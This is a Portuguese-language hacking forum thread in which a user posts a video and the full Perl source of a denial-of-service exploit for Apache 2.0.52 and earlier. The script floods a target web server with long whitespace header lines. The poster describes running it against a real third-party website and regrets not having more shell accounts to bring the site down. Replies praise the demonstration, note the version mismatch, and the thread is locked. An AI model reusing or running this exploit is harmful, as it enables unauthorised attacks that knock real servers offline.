daew pessoal fiz um videozin ai pra galera ver de demonstração de xpl
mais uma vez usei como cobaia o invasao.com.br
aqui fica o link:
http://nathan.ueuo.com/dosapache.htm (http://nathan.ueuo.com/dosapache.htm)
e aqui fika o xpl;
#!/usr/bin/perl
# Based on ->
# apache-squ1rt.c exploit.
#
# Original credit goes to Chintan Trivedi on the
# FullDisclosure mailing list:
# http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html
#
# More info ->
#
# http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942
# Added ->
#
# By default parameter trys = 8000, for DoS Apache web servers on windows system try to
# increase this parameter.
#
# For example. In my system I have 256Mb of RAM. For DoS Apache web severs I run this exploit like this
#
# C:\perl ap2.0.52_dos.pl 127.0.0.1 30000
#
# <+> Prepare to start connect.
# <+> Connected to 127.0.0.1
# <+> Send of first part of devil header.
# <+> Prepare to DoS with 10000 trys.
# <+> Start DoS second part of devil header.
# <SOD> |====================> <EOD>
# <+> Ok now target web server maybe DoSeD.
#
#
# Note ->
#
# If progresbar not response server mybe already DoSeD. Try to open web page hosted on this web servers.
# And if you see "Eror 500" you are lucky man :)
#
# Warnings ->
# This is POC code you can use only on you own servers. Writer don't response if you damadge you servers or
# use it for attack, or others things.
#
# Shit ->
# My English now is bulls shit :( I try study it :)
#
# Grests fly to Chintan Trivedi NsT, RST, Void, Unlock and other underground world.
# Contact to me at greenwood3[AT]yandex[dot]ru
use IO::Socket;
if (@ARGV <1)
{
print "\n ::: ---------------------------------------------- :::\n";
print " ::: Another yet DoS exploit for Apache <= 2.0.52 :::\n";
print " ::: Usage: ap2.0.52_dos.pl <ip> [trys] :::\n";
print " ::: Coded by GreenwooD from Network Security Team :::\n";
print " ::: ---------------------------------------------- :::\n";
exit();
}
print "\n <+> Prepare to start connect.\n";
$s = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>$ARGV[0],
PeerPort=>80,
Timeout=>6
) or die " <-> Target web server already DoSeD ??? or can't connect :(\n";
$s->autoflush();
print " <+> Connected to $ARGV[0]\n";
print " <+> Send of first part of devil header.\n";
print $s "GET / HTTP/1.0\n";
$trys = 8000; # Default
if ($ARGV[1])
{
$trys = $ARGV[1];
}
print " <+> Prepare to DoS with $trys trys.\n";
print " <+> Start DoS send second part of devil header.\n";
print " <SOD> |";
$i=0;
do {
print $s (" " x 8000 . "\n");
if ($i % 500 == 0)
{
print "=";
}
++$i;
} until ($i == $trys);
print "> <EOD>\n";
close($s);
print " <+> Ok now target web server maybe DoSeD.\n";
no video eu soh fiz o server fikar lagged a lot pq eu nao tinha mais shells pra meter ele no chao =)
o xpl eh feito em perl ele "Headers do demonio" com diz no xpl pra derruba o server
bem eh isso ai espero q gostem
flw
qq duvida me questionem
ta funcionando?
aqui não abriu
http://nathan.ueuo.com/dosapache.swf (http://nathan.ueuo.com/dosapache.swf)
tenta ir no link direto =/
po kra aki abriu da primeira vez depois n abriu mais essa merda =(
ai ai como o edit faz falta =(
bem pessoal eu finalmente consegui arrumar tente agora NESSE link
http://nathan.ueuo.com/dosapache.rar (http://nathan.ueuo.com/dosapache.rar)
http://nathan.ueuo.com/dosapache.rar (http://nathan.ueuo.com/dosapache.rar)
http://nathan.ueuo.com/dosapache.rar (http://nathan.ueuo.com/dosapache.rar)
http://nathan.ueuo.com/dosapache.rar (http://nathan.ueuo.com/dosapache.rar)
http://nathan.ueuo.com/dosapache.rar (http://nathan.ueuo.com/dosapache.rar)
esse tah pegando =)
hahahahhahha massa pelo menos o exploit
deixei o kurumim mais novo baixando ontem meia noite meu pai reclamou pq tava levando a banda ai eu agendei pra 1 mas ele nao reiniciou pq tava pausado haahahahahah deixei hj de manha qndo terminar eu volto pra assistir e comentar ^^
boa slul, agora deu certo uhasuhsa

ta bem dahora, usou que programa pra gravar no linux?
Muito boa sua video aula de boa qualidade, você foi direto ao assunto sem enrolar, você esta de parabéns....
;)
Parabens pela video aula slul!!
Bem explicada...e irônica também heheehehehe
"Vixi jah ta bem lento neh
=)
ai ai
q demora e olha q eu jah tava com as img em cache"
auhhahuauahuahuauh
Quanto ao vídeo, bem feito!
Quanto ao exploit, é bem claro quanto a versão que atinge, ou seja, "Apache WebServer 2.052", permitindo ataques causando DoS (consumação de CPU) via HTTP GET requisitado o cabeçalho MIME contendo multiplas linhas com um largo numero de caracteres "Espaço"...
Em resumo, a versão do Apache (v.1.3.36) contida no site discriminado a falha (invasao.com.br) difere, portanto, "tiro na água", o exploit não atingiria a contento seu objetivo.
Quote from: "justiceiro"Quanto ao vídeo, bem feito!
Quanto ao exploit, é bem claro quanto a versão que atinge, ou seja, "Apache WebServer 2.052", permitindo ataques causando DoS (consumação de CPU) via HTTP GET requisitado o cabeçalho MIME contendo multiplas linhas com um largo numero de caracteres "Espaço"...
Em resumo, a versão do Apache (v.1.3.36) contida no site discriminado a falha (invasao.com.br) difere, portanto, "tiro na água", o exploit não atingiria a contento seu objetivo.
Sim justiceiro foi uma falha minha!
eu confundi pq o invasao ficou mais lento mas toda a internet ficou mais lenta com a utilização desse exploit.
Abraços e obrigado pela citação
PS: Algum moderador tranca me arrependi de ter feito a vídeo-aula
principalmente por ter utilizado o invasao.com.br ...
Parece que eles não gostaram muito...
:/
Desculpas aí pessoal
principalmente
pro Thorking e pro souzaDC
Como não é liberado a opção de editar uma postagem, estou complementando a postagem anteriormente colocada por mim.
Realmente o exploit (em perl), fora feito para Apache MENOR ou IGUAL a 2.052, levando a crer realmente que tem que ter muita "Cancha" para derrubar o servidor, ou algum sistema de defesa do servidor tenha evitado, quem sabe em uma próxima vez, como vc disse, com mais "contas Shell"...
Tópico Bloqueado